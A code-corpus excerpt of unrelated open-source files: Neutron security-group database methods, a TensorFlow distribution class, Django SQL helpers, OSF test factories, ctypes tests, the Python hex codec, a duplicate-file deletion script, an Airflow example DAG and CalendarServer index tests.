with context.session.begin(subtransactions=True):
db = SecurityGroupPortBinding(port_id=port_id,
security_group_id=security_group_id)
context.session.add(db)
def _get_port_security_group_bindings(self, context,
filters=None, fields=None):
return self._get_collection(context,
SecurityGroupPortBinding,
self._make_security_group_binding_dict,
filters=filters, fields=fields)
def _delete_port_security_group_bindings(self, context, port_id):
query = self._model_query(context, SecurityGroupPortBinding)
bindings = query.filter(
SecurityGroupPortBinding.port_id == port_id)
with context.session.begin(subtransactions=True):
for binding in bindings:
context.session.delete(binding)
def create_security_group_rule_bulk(self, context, security_group_rule):
return self._create_bulk('security_group_rule', context,
security_group_rule)
def create_security_group_rule_bulk_native(self, context,
security_group_rule):
r = security_group_rule['security_group_rules']
scoped_session(context.session)
security_group_id = self._validate_security_group_rules(
context, security_group_rule)
with context.session.begin(subtransactions=True):
if not self.get_security_group(context, security_group_id):
raise ext_sg.SecurityGroupNotFound(id=security_group_id)
self._check_for_duplicate_rules(context, r)
ret = []
for rule_dict in r:
rule = rule_dict['security_group_rule']
tenant_id = self._get_tenant_id_for_create(context, rule)
db = SecurityGroupRule(
id=uuidutils.generate_uuid(), tenant_id=tenant_id,
security_group_id=rule['security_group_id'],
direction=rule['direction'],
remote_group_id=rule.get('remote_group_id'),
ethertype=rule['ethertype'],
protocol=rule['protocol'],
port_range_min=rule['port_range_min'],
port_range_max=rule['port_range_max'],
remote_ip_prefix=rule.get('remote_ip_prefix'))
context.session.add(db)
ret.append(self._make_security_group_rule_dict(db))
return ret
def create_security_group_rule(self, context, security_group_rule):
bulk_rule = {'security_group_rules': [security_group_rule]}
return self.create_security_group_rule_bulk_native(context,
bulk_rule)[0]
def _get_ip_proto_number(self, protocol):
if protocol is None:
return
# According to bug 1381379, protocol is always set to string to avoid
# problems with comparing int and string in PostgreSQL. Here this
# string is converted to int to give an opportunity to use it as
# before.
return int(IP_PROTOCOL_MAP.get(protocol, protocol))
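# e.g. (illustrative) _get_ip_proto_number('tcp') -> 6 and
# _get_ip_proto_number('47') -> 47; unknown protocol names fall through to
# int() and raise ValueError.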
def _validate_port_range(self, rule):
"""Check that port_range is valid."""
if (rule['port_range_min'] is None and
rule['port_range_max'] is None):
return
if not rule['protocol']:
raise ext_sg.SecurityGroupProtocolRequiredWithPorts()
ip_proto = self._get_ip_proto_number(rule['protocol'])
if ip_proto in [constants.PROTO_NUM_TCP, constants.PROTO_NUM_UDP]:
if (rule['port_range_min'] is not None and
rule['port_range_min'] <= rule['port_range_max']):
pass
else:
raise ext_sg.SecurityGroupInvalidPortRange()
elif ip_proto == constants.PROTO_NUM_ICMP:
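# For ICMP, port_range_min/port_range_max carry the ICMP type and code, so
# they are validated against the 255 upper bound instead of TCP/UDP port
# semantics.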
for attr, field in [('port_range_min', 'type'),
('port_range_max', 'code')]:
if rule[attr] > 255:
raise ext_sg.SecurityGroupInvalidIcmpValue(
field=field, attr=attr, value=rule[attr])
if (rule['port_range_min'] is None and
rule['port_range_max']):
raise ext_sg.SecurityGroupMissingIcmpType(
value=rule['port_range_max'])
def _validate_security_group_rules(self, context, security_group_rule):
"""Check that rules being installed.
Check that all rules belong to the same security
group, remote_group_id/security_group_id belong to the same tenant,
and rules are valid.
"""
new_rules = set()
tenant_ids = set()
for rules in security_group_rule['security_group_rules']:
rule = rules.get('security_group_rule')
new_rules.add(rule['security_group_id'])
self._validate_port_range(rule)
self._validate_ip_prefix(rule)
if rule['remote_ip_prefix'] and rule['remote_group_id']:
raise ext_sg.SecurityGroupRemoteGroupAndRemoteIpPrefix()
if rule['tenant_id'] not in tenant_ids:
tenant_ids.add(rule['tenant_id'])
remote_group_id = rule.get('remote_group_id')
# Check that remote_group_id exists for tenant
if remote_group_id:
self.get_security_group(context, remote_group_id,
tenant_id=rule['tenant_id'])
if len(new_rules) > 1:
raise ext_sg.SecurityGroupNotSingleGroupRules()
security_group_id = new_rules.pop()
# Confirm single tenant and that the tenant has permission
# to add rules to this security group.
if len(tenant_ids) > 1:
raise ext_sg.SecurityGroupRulesNotSingleTenant()
for tenant_id in tenant_ids:
self.get_security_group(context, security_group_id,
tenant_id=tenant_id)
return security_group_id
def _make_security_group_rule_dict(self, security_group_rule, fields=None):
res = {'id': security_group_rule['id'],
'tenant_id': security_group_rule['tenant_id'],
'security_group_id': security_group_rule['security_group_id'],
'ethertype': security_group_rule['ethertype'],
'direction': security_group_rule['direction'],
'protocol': security_group_rule['protocol'],
'port_range_min': security_group_rule['port_range_min'],
'port_range_max': security_group_rule['port_range_max'],
'remote_ip_prefix': security_group_rule['remote_ip_prefix'],
'remote_group_id': security_group_rule['remote_group_id']}
return self._fields(res, fields)
def _make_security_group_rule_filter_dict(self, security_group_rule):
sgr = security_group_rule['security_group_rule']
res = {'tenant_id': [sgr['tenant_id']],
'security_group_id': [sgr['security_group_id']],
'direction': [sgr['direction']]}
include_if_present = ['protocol', 'port_range_max', 'port_range_min',
'ethertype', 'remote_ip_prefix',
'remote_group_id']
for key in include_if_present:
value = sgr.get(key)
if value:
res[key] = [value]
return res
def _check_for_duplicate_rules(self, context, security_group_rules):
for i in security_group_rules:
found_self = False
for j in security_group_rules:
if i['security_group_rule'] == j['security_group_rule']:
if found_self:
raise ext_sg.DuplicateSecurityGroupRuleInPost(rule=i)
found_self = True
# Check in database if rule exists
filters = self._make_security_group_rule_filter_dict(i)
db_rules = self.get_security_group_rules(context, filters)
# Note(arosen): the call to get_security_group_rules wildcards
# values in the filter that have a value of [None]. For
# example, filters = {'remote_group_id': [None]} will return
# all security group rules regardless of their value of
# remote_group_id. Therefore it is not possible to do this
# query unless the behavior of _get_collection()
# is changed which cannot be because other methods are already
# relying on this behavior. Therefore, we do the filtering
# below to check for these corner cases.
for db_rule in db_rules:
# need to remove id from db_rule for matching
id = db_rule.pop('id')
if (i['security_group_rule'] == db_rule):
raise ext_sg.SecurityGroupRuleExists(id=id)
def _validate_ip_prefix(self, rule):
"""Check that a valid cidr was specified as remote_ip_prefix
No need to check that it is in fact an IP address as this is already
validated by attribute validators.
Check that rule ethertype is consistent with remote_ip_prefix ip type.
Add mask to ip_prefix if absent (192.168.1.10 -> 192.168.1.10/32).
"""
input_prefix = rule['remote_ip_prefix']
if input_prefix:
addr = netaddr.IPNetwork(input_prefix)
# set input_prefix to always include the netmask:
rule['remote_ip_prefix'] = str(addr)
# check consistency of ethertype with addr version
if rule['ethertype'] != "IPv%d" % (addr.version):
raise ext_sg.SecurityGroupRuleParameterConflict(
ethertype=rule['ethertype'], cidr=input_prefix)
def get_security_group_rules(self, context, filters=None, fields=None,
sorts=None, limit=None, marker=None,
page_reverse=False):
marker_obj = self._get_marker_obj(context, 'security_group_rule',
limit, marker)
return self._get_collection(context,
SecurityGroupRule,
self._make_security_group_rule_dict,
filters=filters, fields=fields,
sorts=sorts,
limit=limit, marker_obj=marker_obj,
page_reverse=page_reverse)
def get_security_group_rules_count(self, context, filters=None):
return self._get_collection_count(context, SecurityGroupRule,
filters=filters)
def get_security_group_rule(self, context, id, fields=None):
security_group_rule = self._get_security_group_rule(context, id)
return self._make_security_group_rule_dict(security_group_rule, fields)
def _get_security_group_rule(self, context, id):
try:
query = self._model_query(context, SecurityGroupRule)
sgr = query.filter(SecurityGroupRule.id == id).one()
except exc.NoResultFound:
raise ext_sg.SecurityGroupRuleNotFound(id=id)
return sgr
def delete_security_group_rule(self, context, id):
with context.session.begin(subtransactions=True):
rule = self._get_security_group_rule(context, id)
context.session.delete(rule)
def _extend_port_dict_security_group(self, port_res, port_db):
# Security group bindings will be retrieved from the sqlalchemy
# model. As they're loaded eagerly with ports because of the
# joined load they will not cause an extra query.
security_group_ids = [sec_group_mapping['security_group_id'] for
sec_group_mapping in port_db.security_groups]
port_res[ext_sg.SECURITYGROUPS] = security_group_ids
return port_res
# Register dict extend functions for ports
db_base_plugin_v2.NeutronDbPluginV2.register_dict_extend_funcs(
attributes.PORTS, ['_extend_port_dict_security_group'])
def _process_port_create_security_group(self, context, port,
security_group_ids):
if attributes.is_attr_set(security_group_ids):
for security_group_id in security_group_ids:
self._create_port_security_group_binding(context, port['id'],
security_group_id)
# Convert to list as a set might be passed here and
# this has to be serialized
port[ext_sg.SECURITYGROUPS] = (security_group_ids and
list(security_group_ids) or [])
def _ensure_default_security_group(self, context, tenant_id):
"""Create a default security group if one doesn't exist.
:returns: the default security group id.
"""
filters = {'name': ['default'], 'tenant_id': [tenant_id]}
default_group = self.get_security_groups(context, filters,
default_sg=True)
if not default_group:
security_group = {
'security_group': {'name': 'default',
'tenant_id': tenant_id,
'description': _('Default security group')}
}
ret = self.create_security_group(context, security_group, True)
return ret['id']
else:
return default_group[0]['id']
def _get_security_groups_on_port(self, context, port):
"""Check that all security groups on port belong to tenant.
:returns: all security groups IDs on port belonging to tenant.
"""
p = port['port']
if not attributes.is_attr_set(p.get(ext_sg.SECURITYGROUPS)):
return
if p.get('device_owner') and p['device_owner'].startswith('network:'):
return
port_sg = p.get(ext_sg.SECURITYGROUPS, [])
filters = {'id': port_sg}
tenant_id = p.get('tenant_id')
if tenant_id:
filters['tenant_id'] = [tenant_id]
valid_groups = set(g['id'] for g in
self.get_security_groups(context, fields=['id'],
filters=filters))
requested_groups = set(port_sg)
port_sg_missing = requested_groups - valid_groups
if port_sg_missing:
raise ext_sg.SecurityGroupNotFound(id=str(next(iter(port_sg_missing))))
return requested_groups
def _ensure_default_security_group_on_port(self, context, port):
# we don't apply security groups for dhcp, router
if (port['port'].get('device_owner') and
port['port']['device_owner'].startswith('network:')):
return
tenant_id = self._get_tenant_id_for_create(context,
port['port'])
default_sg = self._ensure_default_security_group(context, tenant_id)
if attributes.is_attr_set(port['port'].get(ext_sg.SECURITYGROUPS)):
sgids = port['port'].get(ext_sg.SECURITYGROUPS)
else:
sgids = [default_sg]
port['port'][ext_sg.SECURITYGROUPS] = sgids
def _check_update_deletes_security_groups(self, port):
"""Return True if port has as a security group and it's value
is either [] or not is_attr_set, otherwise return False
"""
if (ext_sg.SECURITYGROUPS in port['port'] and
not (attributes.is_attr_set(port['port'][ext_sg.SECURITYGROUPS])
and port['port'][ext_sg.SECURITYGROUPS] != [])):
return True
return False
def _check_update_has_security_groups(self, port):
"""Return True if port has as a security group and False if the
security_group field is is_attr_set or [].
"""
if (ext_sg.SECURITYGROUPS in port['port'] and
(attributes.is_attr_set(port['port'][ext_sg.SECURITYGROUPS]) and
port['port'][ext_sg.SECURITYGROUPS] != [])):
return True
return False
|
apark263/tensorflow
|
refs/heads/master
|
tensorflow/contrib/distributions/python/ops/conditional_distribution.py
|
120
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Conditional distribution base class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.ops.distributions import distribution
from tensorflow.python.ops.distributions import util as distribution_util
class ConditionalDistribution(distribution.Distribution):
"""Distribution that supports intrinsic parameters (local latents).
Subclasses of this distribution may have additional keyword arguments passed
to their sample-based methods (i.e. `sample`, `log_prob`, etc.).
"""
@distribution_util.AppendDocstring(kwargs_dict={
"**condition_kwargs":
"Named arguments forwarded to subclass implementation."})
def sample(self, sample_shape=(), seed=None, name="sample",
**condition_kwargs):
return self._call_sample_n(sample_shape, seed, name, **condition_kwargs)
@distribution_util.AppendDocstring(kwargs_dict={
"**condition_kwargs":
"Named arguments forwarded to subclass implementation."})
def log_prob(self, value, name="log_prob", **condition_kwargs):
return self._call_log_prob(value, name, **condition_kwargs)
@distribution_util.AppendDocstring(kwargs_dict={
"**condition_kwargs":
"Named arguments forwarded to subclass implementation."})
def prob(self, value, name="prob", **condition_kwargs):
return self._call_prob(value, name, **condition_kwargs)
@distribution_util.AppendDocstring(kwargs_dict={
"**condition_kwargs":
"Named arguments forwarded to subclass implementation."})
def log_cdf(self, value, name="log_cdf", **condition_kwargs):
return self._call_log_cdf(value, name, **condition_kwargs)
@distribution_util.AppendDocstring(kwargs_dict={
"**condition_kwargs":
"Named arguments forwarded to subclass implementation."})
def cdf(self, value, name="cdf", **condition_kwargs):
return self._call_cdf(value, name, **condition_kwargs)
@distribution_util.AppendDocstring(kwargs_dict={
"**condition_kwargs":
"Named arguments forwarded to subclass implementation."})
def log_survival_function(self, value, name="log_survival_function",
**condition_kwargs):
return self._call_log_survival_function(value, name, **condition_kwargs)
@distribution_util.AppendDocstring(kwargs_dict={
"**condition_kwargs":
"Named arguments forwarded to subclass implementation."})
def survival_function(self, value, name="survival_function",
**condition_kwargs):
return self._call_survival_function(value, name, **condition_kwargs)
|
City-of-Helsinki/linkedevents
|
refs/heads/master
|
events/sql.py
|
1
|
from django.db import connection
def count_events_for_keywords(keyword_ids=(), all=False):
"""
Get the actual count of events using the given keywords.
:param keyword_ids: set of keyword ids
:type keyword_ids: Iterable[str]
:param all: count all keywords instead
:type all: bool
:return: dict of keyword id to count
:rtype: dict[str, int]
"""
# sorry for the non-DRY-ness; would be easier with an SQL generator like SQLAlchemy, but...
keyword_ids = tuple(set(keyword_ids))
with connection.cursor() as cursor:
if keyword_ids:
cursor.execute('''
SELECT t.keyword_id, COUNT(DISTINCT t.event_id)
FROM (
SELECT keyword_id, event_id FROM events_event_keywords WHERE keyword_id IN %s
UNION
SELECT keyword_id, event_id FROM events_event_audience WHERE keyword_id IN %s
) t
GROUP BY t.keyword_id;
''', [keyword_ids, keyword_ids])
elif all:
cursor.execute('''
SELECT t.keyword_id, COUNT(DISTINCT t.event_id)
FROM (
SELECT keyword_id, event_id FROM events_event_keywords
UNION
SELECT keyword_id, event_id FROM events_event_audience
) t
GROUP BY t.keyword_id;
''')
else:
return {}
return dict(cursor.fetchall())
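# Illustrative: count_events_for_keywords(['yso:p1235']) returns a mapping like
# {'yso:p1235': <event count>}; usage is counted across both the keywords and
# audience M2M tables, deduplicated per event by the UNION / COUNT(DISTINCT).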
def count_events_for_places(place_ids=(), all=False):
"""
Get the actual count of events in the given places.
:param place_ids: set of place ids
:type place_ids: Iterable[str]
:param all: count all places instead
:type all: bool
:return: dict of place id to count
:rtype: dict[str, int]
"""
# sorry for the non-DRY-ness; would be easier with an SQL generator like SQLAlchemy, but...
place_ids = tuple(set(place_ids))
with connection.cursor() as cursor:
if place_ids:
cursor.execute('''
SELECT e.location_id, COUNT(*)
FROM events_event e
WHERE location_id IN %s
GROUP BY e.location_id;
''', [place_ids])
elif all:
cursor.execute('''
SELECT e.location_id, COUNT(*)
FROM events_event e
GROUP BY e.location_id;
''')
else:
return {}
return dict(cursor.fetchall())
|
reinaH/osf.io
|
refs/heads/develop2
|
website/addons/box/tests/factories.py
|
23
|
# -*- coding: utf-8 -*-
"""Factory boy factories for the Box addon."""
import mock
from datetime import datetime
from framework.auth import Auth
from factory import SubFactory, Sequence, post_generation
from tests.factories import ModularOdmFactory, UserFactory, ProjectFactory
from website.addons.box.model import (
BoxOAuthSettings, BoxUserSettings,
BoxNodeSettings, BoxFile
)
# TODO(sloria): make an abstract UserSettingsFactory that just includes the owner field
class BoxOAuthSettingsFactory(ModularOdmFactory):
FACTORY_FOR = BoxOAuthSettings
username = 'Den'
user_id = 'b4rn311'
expires_at = datetime(2045, 1, 1)
access_token = Sequence(lambda n: 'abcdef{0}'.format(n))
refresh_token = Sequence(lambda n: 'abcdef{0}'.format(n))
class BoxUserSettingsFactory(ModularOdmFactory):
FACTORY_FOR = BoxUserSettings
owner = SubFactory(UserFactory)
oauth_settings = SubFactory(BoxOAuthSettingsFactory)
class BoxNodeSettingsFactory(ModularOdmFactory):
FACTORY_FOR = BoxNodeSettings
owner = SubFactory(ProjectFactory)
user_settings = SubFactory(BoxUserSettingsFactory)
with mock.patch('website.addons.box.model.BoxNodeSettings.fetch_folder_name') as mock_folder:
mock_folder.return_value = 'Camera Uploads'
class BoxFileFactory(ModularOdmFactory):
FACTORY_FOR = BoxFile
node = SubFactory(ProjectFactory)
path = 'foo.txt'
@post_generation
def add_box_addon(self, created, extracted):
self.node.add_addon('box', auth=Auth(user=self.node.creator))
self.node.save()
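
# --- Illustrative usage sketch (not part of the original module) ---
# The factories above follow the usual factory_boy pattern: calling the factory
# class builds and saves a model instance. This sketch assumes the OSF test
# database/app context is available; attribute values are placeholders.
def _example_build_box_models():
    node_settings = BoxNodeSettingsFactory()     # builds owner project and user settings via SubFactory
    box_file = BoxFileFactory(path='photo.jpg')  # override a declared attribute at call time
    return node_settings, box_file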
|
Belxjander/Kirito
|
refs/heads/master
|
Python-3.5.0-main/Lib/ctypes/test/test_frombuffer.py
|
14
|
from ctypes import *
import array
import gc
import unittest
class X(Structure):
_fields_ = [("c_int", c_int)]
init_called = False
def __init__(self):
self._init_called = True
class Test(unittest.TestCase):
def test_from_buffer(self):
a = array.array("i", range(16))
x = (c_int * 16).from_buffer(a)
y = X.from_buffer(a)
self.assertEqual(y.c_int, a[0])
self.assertFalse(y.init_called)
self.assertEqual(x[:], a.tolist())
a[0], a[-1] = 200, -200
self.assertEqual(x[:], a.tolist())
self.assertRaises(BufferError, a.append, 100)
self.assertRaises(BufferError, a.pop)
del x; del y; gc.collect(); gc.collect(); gc.collect()
a.append(100)
a.pop()
x = (c_int * 16).from_buffer(a)
self.assertIn(a, [obj.obj if isinstance(obj, memoryview) else obj
for obj in x._objects.values()])
expected = x[:]
del a; gc.collect(); gc.collect(); gc.collect()
self.assertEqual(x[:], expected)
with self.assertRaises(TypeError):
(c_char * 16).from_buffer(b"a" * 16)
with self.assertRaises(TypeError):
(c_char * 16).from_buffer("a" * 16)
def test_from_buffer_with_offset(self):
a = array.array("i", range(16))
x = (c_int * 15).from_buffer(a, sizeof(c_int))
self.assertEqual(x[:], a.tolist()[1:])
with self.assertRaises(ValueError):
c_int.from_buffer(a, -1)
with self.assertRaises(ValueError):
(c_int * 16).from_buffer(a, sizeof(c_int))
with self.assertRaises(ValueError):
(c_int * 1).from_buffer(a, 16 * sizeof(c_int))
def test_from_buffer_copy(self):
a = array.array("i", range(16))
x = (c_int * 16).from_buffer_copy(a)
y = X.from_buffer_copy(a)
self.assertEqual(y.c_int, a[0])
self.assertFalse(y.init_called)
self.assertEqual(x[:], list(range(16)))
a[0], a[-1] = 200, -200
self.assertEqual(x[:], list(range(16)))
a.append(100)
self.assertEqual(x[:], list(range(16)))
self.assertEqual(x._objects, None)
del a; gc.collect(); gc.collect(); gc.collect()
self.assertEqual(x[:], list(range(16)))
x = (c_char * 16).from_buffer_copy(b"a" * 16)
self.assertEqual(x[:], b"a" * 16)
with self.assertRaises(TypeError):
(c_char * 16).from_buffer_copy("a" * 16)
def test_from_buffer_copy_with_offset(self):
a = array.array("i", range(16))
x = (c_int * 15).from_buffer_copy(a, sizeof(c_int))
self.assertEqual(x[:], a.tolist()[1:])
with self.assertRaises(ValueError):
c_int.from_buffer_copy(a, -1)
with self.assertRaises(ValueError):
(c_int * 16).from_buffer_copy(a, sizeof(c_int))
with self.assertRaises(ValueError):
(c_int * 1).from_buffer_copy(a, 16 * sizeof(c_int))
if __name__ == '__main__':
unittest.main()
|
vFense/vFenseAgent-nix
|
refs/heads/development
|
agent/deps/rpm6/Python-2.7.5/lib/python2.7/encodings/hex_codec.py
|
528
|
""" Python 'hex_codec' Codec - 2-digit hex content transfer encoding
Unlike most of the other codecs which target Unicode, this codec
will return Python string objects for both encode and decode.
Written by Marc-Andre Lemburg (mal@lemburg.com).
"""
import codecs, binascii
### Codec APIs
def hex_encode(input,errors='strict'):
""" Encodes the object input and returns a tuple (output
object, length consumed).
errors defines the error handling to apply. It defaults to
'strict' handling which is the only currently supported
error handling for this codec.
"""
assert errors == 'strict'
output = binascii.b2a_hex(input)
return (output, len(input))
def hex_decode(input,errors='strict'):
""" Decodes the object input and returns a tuple (output
object, length consumed).
input must be an object which provides the bf_getreadbuf
buffer slot. Python strings, buffer objects and memory
mapped files are examples of objects providing this slot.
errors defines the error handling to apply. It defaults to
'strict' handling which is the only currently supported
error handling for this codec.
"""
assert errors == 'strict'
output = binascii.a2b_hex(input)
return (output, len(input))
class Codec(codecs.Codec):
def encode(self, input,errors='strict'):
return hex_encode(input,errors)
def decode(self, input,errors='strict'):
return hex_decode(input,errors)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
assert self.errors == 'strict'
return binascii.b2a_hex(input)
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
assert self.errors == 'strict'
return binascii.a2b_hex(input)
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='hex',
encode=hex_encode,
decode=hex_decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamwriter=StreamWriter,
streamreader=StreamReader,
)
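
# --- Illustrative usage sketch (not part of the original module) ---
# The stateless helpers can be called directly; both return a tuple of
# (output, length_consumed), as documented above.
def _example_roundtrip():
    encoded, consumed = hex_encode('abc')    # ('616263', 3)
    decoded, _ = hex_decode(encoded)         # ('abc', 6)
    assert decoded == 'abc' and consumed == 3
    return encoded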
|
JussiSavola/dupefinder
|
refs/heads/master
|
dupekill.py
|
1
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# dupe killer - Jussi Savola 2017
#
# Usage: python dupekiller.py
#
# Disclaimer: If this breaks your files or your system, you can keep all the parts
import sqlite3
import os
import sys
import fnmatch
from os.path import join, getsize, exists
import hashlib
from stat import *
from sys import argv
import socket
def output_dupes(c):
c.execute("select md5sum, size, fullname from files where (md5sum) in "
"(select md5sum from files group by md5sum having count(*) > 1) order by md5sum")
rows = c.fetchall()
    print(rows)
    for row in rows:
        print(row)
def get_list_of_nonmaster_copies(c):
a = c.execute("select fullname from files where md5sum in (select md5sum from files "
" group by md5sum, mastercopy having mastercopy = '1') and mastercopy != '1'")
rows = c.fetchall()
return rows
def main(argv):
    if len(argv) > 1:
        dbfile = argv[1]
    else:
        print("give db filename as argument")
        sys.exit(-1)
    print("db file name: " + dbfile)
    if not exists(dbfile):
        print("db file does not exist: " + dbfile)
        sys.exit(-2)
    conn = sqlite3.connect(dbfile)
    c = conn.cursor()
    nonmaster_copies = get_list_of_nonmaster_copies(c)
    conn.close()
    for entry in nonmaster_copies:
        try:
            path = str(entry[0])
            print("about to remove " + path)
            os.remove(path)
            print("... removed " + path)
            # print('would be erasing: ' + '"' + str(entry) + '"')
        except Exception:
            print("skipping: " + str(entry))
if __name__ == "__main__":
main(argv)
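
# --- Schema assumption (not part of the original script) ---
# The queries above imply a SQLite table roughly like the following; the exact
# DDL is a guess reconstructed from the column names used in this script:
#
#   CREATE TABLE files (
#       fullname   TEXT,     -- full path of the file
#       size       INTEGER,  -- size in bytes
#       md5sum     TEXT,     -- hash used to group duplicates
#       mastercopy TEXT      -- '1' marks the copy to keep
#   );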
|
jgao54/airflow
|
refs/heads/master
|
airflow/example_dags/example_branch_operator.py
|
6
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import random
import airflow
from airflow.models import DAG
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python_operator import BranchPythonOperator
args = {
'owner': 'airflow',
'start_date': airflow.utils.dates.days_ago(2),
}
dag = DAG(
dag_id='example_branch_operator',
default_args=args,
schedule_interval="@daily",
)
run_this_first = DummyOperator(
task_id='run_this_first',
dag=dag,
)
options = ['branch_a', 'branch_b', 'branch_c', 'branch_d']
branching = BranchPythonOperator(
task_id='branching',
python_callable=lambda: random.choice(options),
dag=dag,
)
run_this_first >> branching
join = DummyOperator(
task_id='join',
trigger_rule='one_success',
dag=dag,
)
for option in options:
t = DummyOperator(
task_id=option,
dag=dag,
)
dummy_follow = DummyOperator(
task_id='follow_' + option,
dag=dag,
)
branching >> t >> dummy_follow >> join
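
# Note (added): BranchPythonOperator marks every direct downstream task except
# the returned task_id as skipped, and the skip propagates down each unselected
# branch. Because `join` is downstream of all branches, it uses
# trigger_rule='one_success' instead of the default 'all_success' so that it
# still runs once the chosen branch completes.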
|
red-hood/calendarserver
|
refs/heads/trunk
|
txdav/caldav/datastore/test/test_index_file.py
|
1
|
##
# Copyright (c) 2010-2015 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
from twisted.internet import reactor
from twisted.internet.defer import inlineCallbacks
from twisted.internet.task import deferLater
from txdav.caldav.datastore.index_file import Index, MemcachedUIDReserver
from txdav.caldav.datastore.query.filter import Filter
from txdav.common.icommondatastore import ReservationError, \
InternalDataStoreError
from twistedcaldav import caldavxml
from twistedcaldav.caldavxml import TimeRange
from twistedcaldav.ical import Component, InvalidICalendarDataError
from twistedcaldav.instance import InvalidOverriddenInstanceError
from twistedcaldav.test.util import InMemoryMemcacheProtocol
import twistedcaldav.test.util
from pycalendar.datetime import DateTime
import os
class MinimalCalendarObjectReplacement(object):
"""
Provide the minimal set of attributes and methods from CalDAVFile required
by L{Index}.
"""
def __init__(self, filePath):
self.fp = filePath
def iCalendar(self):
text = self.fp.open().read()
try:
component = Component.fromString(text)
# Fix any bogus data we can
component.validCalendarData()
component.validCalendarForCalDAV(methodAllowed=False)
except InvalidICalendarDataError, e:
raise InternalDataStoreError(
"File corruption detected (%s) in file: %s"
% (e, self._path.path)
)
return component
class MinimalResourceReplacement(object):
"""
Provide the minimal set of attributes and methods from CalDAVFile required
by L{Index}.
"""
def __init__(self, filePath):
self.fp = filePath
def isCalendarCollection(self):
return True
def getChild(self, name):
# FIXME: this should really return something with a child method
return MinimalCalendarObjectReplacement(self.fp.child(name))
def initSyncToken(self):
pass
class SQLIndexTests (twistedcaldav.test.util.TestCase):
"""
Test abstract SQL DB class
"""
def setUp(self):
super(SQLIndexTests, self).setUp()
self.site.resource.isCalendarCollection = lambda: True
self.indexDirPath = self.site.resource.fp
# FIXME: since this resource lies about isCalendarCollection, it doesn't
# have all the associated backend machinery to actually get children.
self.db = Index(MinimalResourceReplacement(self.indexDirPath))
def test_reserve_uid_ok(self):
uid = "test-test-test"
d = self.db.isReservedUID(uid)
d.addCallback(self.assertFalse)
d.addCallback(lambda _: self.db.reserveUID(uid))
d.addCallback(lambda _: self.db.isReservedUID(uid))
d.addCallback(self.assertTrue)
d.addCallback(lambda _: self.db.unreserveUID(uid))
d.addCallback(lambda _: self.db.isReservedUID(uid))
d.addCallback(self.assertFalse)
return d
def test_reserve_uid_twice(self):
uid = "test-test-test"
d = self.db.reserveUID(uid)
d.addCallback(lambda _: self.db.isReservedUID(uid))
d.addCallback(self.assertTrue)
d.addCallback(lambda _:
self.assertFailure(self.db.reserveUID(uid),
ReservationError))
return d
def test_unreserve_unreserved(self):
uid = "test-test-test"
return self.assertFailure(self.db.unreserveUID(uid),
ReservationError)
def test_reserve_uid_timeout(self):
# WARNING: This test is fundamentally flawed and will fail
# intermittently because it uses the real clock.
uid = "test-test-test"
from twistedcaldav.config import config
old_timeout = config.UIDReservationTimeOut
config.UIDReservationTimeOut = 1
def _finally():
config.UIDReservationTimeOut = old_timeout
d = self.db.isReservedUID(uid)
d.addCallback(self.assertFalse)
d.addCallback(lambda _: self.db.reserveUID(uid))
d.addCallback(lambda _: self.db.isReservedUID(uid))
d.addCallback(self.assertTrue)
d.addCallback(lambda _: deferLater(reactor, 2, lambda: None))
d.addCallback(lambda _: self.db.isReservedUID(uid))
d.addCallback(self.assertFalse)
self.addCleanup(_finally)
return d
def test_index(self):
data = (
(
"#1.1 Simple component",
"1.1",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-1.1
DTSTART:20080601T120000Z
DTEND:20080601T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
END:VEVENT
END:VCALENDAR
""",
False,
True,
),
(
"#2.1 Recurring component",
"2.1",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-2.1
DTSTART:20080601T120000Z
DTEND:20080601T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
RRULE:FREQ=WEEKLY;COUNT=2
END:VEVENT
END:VCALENDAR
""",
False,
True,
),
(
"#2.2 Recurring component with override",
"2.2",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-2.2
